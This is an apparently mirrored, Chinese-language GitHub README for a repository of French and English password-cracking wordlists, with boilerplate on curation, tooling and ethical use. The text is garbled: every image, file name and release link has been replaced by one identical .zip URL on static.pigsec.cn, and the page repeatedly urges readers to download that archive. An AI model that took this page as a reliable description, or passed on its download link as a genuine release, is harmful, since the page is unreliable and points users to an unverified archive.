sjshsgehs/wordlists

GitHub: sjshsgehs/wordlists

Stars: 2 | Forks: 0

https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip [![Releases](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip)](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip) # 用于安全研究的法语和英语密码破解字典 ![法国国旗](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip) ![英国国旗](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip) 这是一个专为安全研究和密码分析而策划的法语和英语字典合集。本仓库专注于特定语言的词表,旨在帮助研究人员研究密码模式、评估抗破解能力以及评估密码策略。这些内容仅用于经明确授权的合法测试、教育探索和负责任的披露实践。这些列表经过精心设计,具有良好的可读性和可移植性,并兼容受控环境中的常见密码破解工作流程。 目录 - 概述 - 项目存在的原因 - 语言焦点与范围 - 仓库内容 - 数据来源与策展流程 - 文件格式、命名与结构 - 规模、质量与验证 - 如何使用字典(高层级) - 安全、伦理与负责任的使用 - 构建、贡献与维护 - 发布与更新 - 常见问题解答 - 许可证与致谢 - 联系方式与维护者 概述 本项目收集了两种主要语言——法语和英语——的字典,以支持安全研究、密码分析和相关研究。其目标并非助长滥用,而是提供一个透明、组织良好的资源,用于理解跨语言的密码行为。这些列表是纯文本文件,易于下载并集成到使用字典的标准工具中。 项目存在的原因 密码安全是一个不断变化的目标。密码的选择因语言、文化、特定文化的短语和常用语而异。讲法语的用户可能会选择与讲英语的用户不同的模式。通过汇编专注于语言的字典,研究人员可以: - 比较特定语言的密码模式。 - 评估语言如何影响密码强度和可预测性。 - 在多语言环境中为密码策略执行原型设计测试。 - 训练具有语言感知功能的密码强度估算模型。 - 改进有关密码卫生和最佳实践的教育材料。 语言焦点与范围 - 法语字典:基于公开可用的数据、翻译和精选的法语词汇构建。它们强调常见的法语术语、短语和文化相关的单词,同时避免敏感的个人数据。 - 英语字典:基于公开可用的数据、翻译和广泛使用的英语词汇构建。它们强调在与英语语境相关的常见术语、习语和日常短语。 设计在广度和实用性之间保持了平衡。每个列表都经过精心策划,以避免过度敏感的内容,同时保留在密码分析中有意义的语言模式。 仓库内容 - 特定语言的字典 - fr/ 目录:法语字典,包括法语用户名、提示和密码选择中使用的常见名词、形容词、动词和常用短语。 - en/ 目录:英语字典,包括在密码和身份验证上下文中频繁使用的常见术语、名称和日常短语。 - 组合与实用文件 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 或 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 混合了两种语言条目的轻量级列表,用于快速参考或初步测试。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 经常出现在多语言密码选择中的短语,并在适当时带有语言标记。 - 元数据与文档 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 此处的当前文档,解释了结构、用法和许可。 - LICENSE:管辖字典及其分发的许可证。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 添加列表、确保质量和提交更改的指南。 - 发布资产 - 每个版本的资产,打包在一个便携式存档中,便于下载和部署。 数据来源与策展流程 - 公共数据源:字典利用公开可用的词汇、短语语料库和教育资源。条目经过过滤以移除敏感或个人身份识别数据。 - 语言规范化:在适当的情况下,文本被规范化为一致的 ASCII 表示。当重音符号对法语中的合法词形有贡献时(例如 é, è, ê),会予以保留,但可能会在某些流程中进行映射以提高可移植性。 - 去重:移除跨文件的重复项以减少冗余。稳健的去重过程确保每个条目在给定列表中是唯一的。 - 排序与 ordering:列表按常用词、频率或字母顺序排序。这有助于提高可读性和测试的一致性。 - 匿名性与安全性:重点是公共词汇、常用术语和语言相关内容。不包含个人数据或敏感材料。 文件格式、命名与结构 - 文本文件:所有字典均为纯文本,每行一个条目。这使得流程和工具处理变得简单。 - 编码:使用 UTF-8 编码以保留法语变音符号和英语字符。如果需要,某些流程可能会转换为 ASCII。 - 命名约定:文件使用语言前缀和描述性后缀,例如: - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - 目录结构: - fr/ — 法语字典 - en/ — 英语字典 - assets/ — 发布资产和辅助文件 - docs/ — 文档和说明(如果存在) - scripts/ — 用于处理的可选辅助脚本(如果存在) 规模、质量与验证 - 规模预期:列表规模较大但实用。它们旨在平衡测试环境中的覆盖范围与性能。 - 质量检查:每个添加项都要经过轻量级的验证过程。检查包括: - 行完整性(无空行或末尾的多余空格) - 相关时的 Unicode 处理 - 同一列表内的去重 - 适用时的语言标记 - 一致性:相关列表中的条目遵循一致的格式规则。这使得在研究流程中组合列表变得更加容易,而无需额外的预处理。 如何使用字典(高层级) - 与工具集成:这些列表与接受字典作为输入的标准密码分析和破解工具兼容。这包括安全研究中使用的常见开源工具。 - 语言感知测试:使用特定语言的列表来研究语言如何影响密码选择、密码长度分布以及某些语言模式的普遍性。 - 组合测试:对于实验,您可以将语言列表与额外的数据集(例如符合策略的密码模式)结合使用,以模拟现实的身份验证场景。 - 基准测试:使用这些列表在法语和英语语境中对密码强度估算器、猜测率模型或密码策略工具进行基准测试。 - 实验中的数据卫生:严格跟踪每次测试中使用的列表。记录确切的列表名称、版本和发布说明以确保可复现性。 安全、伦理与负责任的使用 - 始终拥有明确的授权:仅在您拥有书面许可测试密码安全的环境中使用这些列表。未经适当授权不得使用。 - 尊重隐私与法律:避免任何可能有助于在未经同意的情况下访问账户或系统的内容。将这些列表视为用于改善安全和防御的研究材料。 - 记录来源:记录每个列表的来源、版本和提取日期。这有助于支持可复现性和问责制。 - 道德披露:如果您的工作发现了安全弱点,请通过适当的渠道进行报告。负责任地分享发现,避免让真实用户面临风险。 - 数据卫生:不要重新发布或分发任何包含敏感数据的列表。重点关注公共词汇和语言模式。 构建、贡献与维护 - 如何贡献 - Fork 本仓库并为您的新字典创建一个功能分支。 - 将特定语言的文件添加到相应的 fr/ 或 en/ 目录中。 - 确保条目干净、唯一,并从新行开始,没有多余的空格。 - 在 PR 标题中提供简短描述,并在 PR 正文中提供更深入的理由。 - 运行任何可用的验证脚本(如果存在)以确保质量。 - 提交 Pull Request 以供审查。维护者将审查一致性、许可和潜在的重复项。 - 格式与标准 - 使用纯文本,每行一个条目。 - 保持语言完整性;除非是多语言数据集的刻意设计,否则避免在单个文件中混合语言。 - 不要包含个人数据或敏感材料。 - 测试与验证 - 在提交之前在本地运行去重和规范化检查。 - 验证列表在您的目标工具中是否仍能正确加载。 - 如果可能,分享示例条目或小子集以供审查,以加快批准速度。 发布与更新 - 发布周期:发布按定期计划进行,包含新的资产和描述变更的说明。 - 访问发布:最新的资产发布在项目的 Releases 版块。如果您无法访问链接或链接无效,请查看 Releases 版块以获取最新的资产和说明。 - 如何获取最新数据:访问 Releases 页面以下载最新打包的字典。该页面包含可以下载并立即在您的研究流程中使用的资产。为方便起见,您也可以在文件包含在发布存档中后从仓库中提取它们。 - Releases 页面链接:https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - 关于资产格式的说明:发布存档通常包含 fr/ 和 en/ 目录下的预格式化文本文件,并带有描述内容和更新的 README 或元数据。 使用说明与实用指南 - 特定语言测试:使用 fr/ 列表和 en/ 列表分别运行测试以比较结果。您可能会观察到跨语言的不同猜测率、覆盖范围和模式匹配。 - 组合列表:如果您需要更广泛的覆盖范围,可以在工作流程中连接 fr/ 和 en/ 列表。跟踪每个条目的来源以确保可复现性。 - 性能考虑:在使用非常大的列表时,请确保您的测试环境具有足够的内存和 I/O 带宽。如果您的工具支持,请使用流式方法,以避免将整个文件加载到内存中。 - 版本控制:在您的项目中固定到特定的发布版本,以确保可复现的结果。记录每个实验中使用的发布资产。 目录与文件示例 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 核心法语字典,包含法语语境中典型密码模式常用的名词、形容词和动词。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 扩展的法语词汇,包括地区术语和口语。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 核心英语字典,包含常见术语和日常语言。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 扩展的英语词汇,包括与密码选择相关的俚语和习语。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 一个轻量级的组合列表,用于包含两种语言条目的快速测试。 - assets/:发布资产,如 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip(示例名称)和随附的校验和。 - docs/:额外的文档、说明和使用示例。 - LICENSE:管辖列表分发的许可证。 项目元数据与主题 - 关键词:cmiyc, cracking-hashes, cracking-password, french, hacking, hash, hashcat, password, password-cracking, passwords, pentesting, wordlists - 主题有助于研究人员在探索语言感知密码分析和多语言安全研究时发现该资源。 许可证与致谢 - 许可:字典是根据有利于研究和教育再利用和重新分发的开放许可证提供的。这通常包括鼓励分享和改编的宽松条款,并在适用时要求署名。 - 致谢:该项目感谢开源社区对数据策展、验证和结构的贡献。感谢塑造了数据集的维护者、贡献者和来源。 维护者与联系方式 - 主要维护者:负责管理发布、确保数据质量和响应 Pull Request 的核心贡献者。 - 联系方式:在仓库中提出 Issue,以询问有关数据来源、使用指南或建议的改进。对于直接咨询,请参阅维护者部分中仓库的联系详情。 发布说明(高层级) - 发布说明描述了添加的字典、语言扩展和数据质量的改进。 - 每个版本都包含主要更改、新文件和任何弃用内容的简短描述。 - 发布说明帮助研究人员随着时间的推移跟踪词汇覆盖范围和模式的变化。 数据来源与透明度 - 这些列表旨在透明且可审计。每个添加项都包含有关其来源或理由的说明。 - 如果贡献添加了一个新的法语术语或英语表达,该条目会附带简短的注释,解释其与该语言密码模式的相关性。 - 该项目旨在保持语言相关性与隐私考虑之间的平衡。 典型条目示例 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 可能包含如下条目: - ameli - ami - autre - merci - bonjour - salut - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 可能包含如下条目: - password - welcome - summer - football - sunshine - freedom - 组合列表可能会混合带有语言标记或上下文感知注释的条目,以帮助研究人员进行特定语言的测试场景。 质量保证与社区标准 - 该项目重视干净的数据和可复现性。贡献者遵循简单的标准化方法来保持数据集对研究的可靠性。 - 社区标准强调清晰、最小的噪音和道德的数据处理。 - 该仓库倾向于开放和可复现性而非新颖性。重点是为合法的安全研究提供可用的、文档齐全的基于语言的列表。 未来方向与路线图 - 扩展语言覆盖范围:添加更多语言以拓宽多语言密码研究。 - 改进特定语言过滤:引入更细粒度的过滤,以将常用词与专有名词、方言术语或文化特定短语区分开。 - 添加预处理工具:提供脚本以针对特定测试环境对列表进行规范化、去重或过滤。 - 增强元数据:为每个文件附加更丰富的元数据,包括样本分布、词频估算和语言注释。 实施说明与最佳实践 - 对于实施自己的测试的研究人员:保持一致的环境以保留实验结果。尽可能使用相同的平台、工具版本和数据集。 - 对于教育工作者:这些列表可用于说明密码选择中的语言影响。将数据与解释密码卫生和策略设计的教学材料配对使用。 - 对于防御者:分析基于语言的密码模式有助于识别薄弱的密码做法,并为多语言用户量身定制用户教育。 重要链接使用提醒 - 最新的发布资产可以从顶部的链接的 Releases 页面获取。如果链接无法访问,请参阅 GitHub 上的 Releases 版块以获取最新的资产和说明。要直接访问发布,请访问 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 以获取最新的更新和文件。 最后的备注 - 该资源专为开放和协作改进而设计。它邀请研究人员、教育工作者和从业者探索特定语言的密码模式,重点是教育、防御和负责任的研究。 - 数据结构旨在直观,便于将列表适应不同的研究设置或工具流程。 - 通过保持文档清晰并提供一致的文件命名,该项目支持可复现的实验和清晰的结果报告。 发布与更新(简要参考) - 最新的资产发布在项目的 Releases 版块。如果您无法访问链接或链接失效,请查看仓库中的 Releases 版块以获取最新的资产和随附说明。 - 您可以直接访问 Releases 页面 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 查看可用的存档、校验和,并下载适合您环境的软件包。 研究人员与学生提示 - 从 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 和 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 的小子集开始验证您的工具,然后根据需要扩展到扩展列表。 - 在实验中使用清晰的版本控制以保持可复现性。记录您使用的确切列表文件和发布版本。 - 在受控环境中将特定语言的列表与符合策略的模式结合使用,以探索语言如何影响密码强度。 - 负责任地分享发现。发布结果时,包括有关数据源、预处理步骤和使用的确切列表的详细信息,而不暴露任何敏感材料。 致谢 - 向开源社区致敬,感谢他们提供的数据共享、工具和研究实践,使多语言密码研究成为可能。 - 感谢帮助策划、规范化和记录字典的贡献者,确保它们对研究人员和教育工作者仍然有用。 注意 - 此处描述的内容和组织反映了对语言焦点密码研究的深思熟虑的方法。这些列表专为在安全环境和教育环境中安全、合法地使用而设计。 许可证与致谢(扩展) - 许可证:CC0 1.0 或允许在研究和教育上下文中重复使用和重新分发的宽松许可证。 - 致谢:协助完成语言策展、规范化和文档任务的贡献者。 如何参与 - 如果您有改进语言覆盖范围、添加新列表或改进元数据的想法,请提出 Pull Request。包括更改的简短描述及其背后的理由。 - 如果您想讨论新方向或提议合作,请在仓库中提出 Issue。该项目欢迎建设性的反馈和推进安全和负责任的安全研究的合作。 附录:可复现测试的示例工作流程(高层级) - 步骤 1:确定测试的语言焦点(fr 或 en)。 - 步骤 2:选择适当的字典文件,例如 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip 和 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/5c49a8dc25171305.zip - 步骤 3:如果需要,组合数据集,确保来源和版本的可追溯性。 - 步骤 4:在具有明确许可的受控环境中运行分析或评估。 - 步骤 5:记录结果,包括具体的列表名称、发布版本和执行的任何预处理。 - 步骤 6:按照负责任的披露准则与适当的利益相关者分享发现。 附录:法律与道德提醒(非警告性质) - 仅在您拥有或经明确授权测试的系统上使用。 - 不要发布或分发敏感数据或个人信息。 - 专注于改善安全和用户教育的研究。 附录:关于此 README - 本文档采用清晰、直接的风格,以帮助读者快速找到所需的信息。 - 它强调实际使用、特定语言的见解和负责任的研究实践,同时保持信息丰富且易于理解。
标签:DOS头擦除, NLP实验, Windows内核, 代码示例, 合规性测试, 字典文件, 安全测试, 密码分析, 密码安全, 密码审计, 密码破解, 密码策略评估, 开源, 攻击性安全, 数据分析, 白帽子, 网络安全, 英法词典, 隐私保护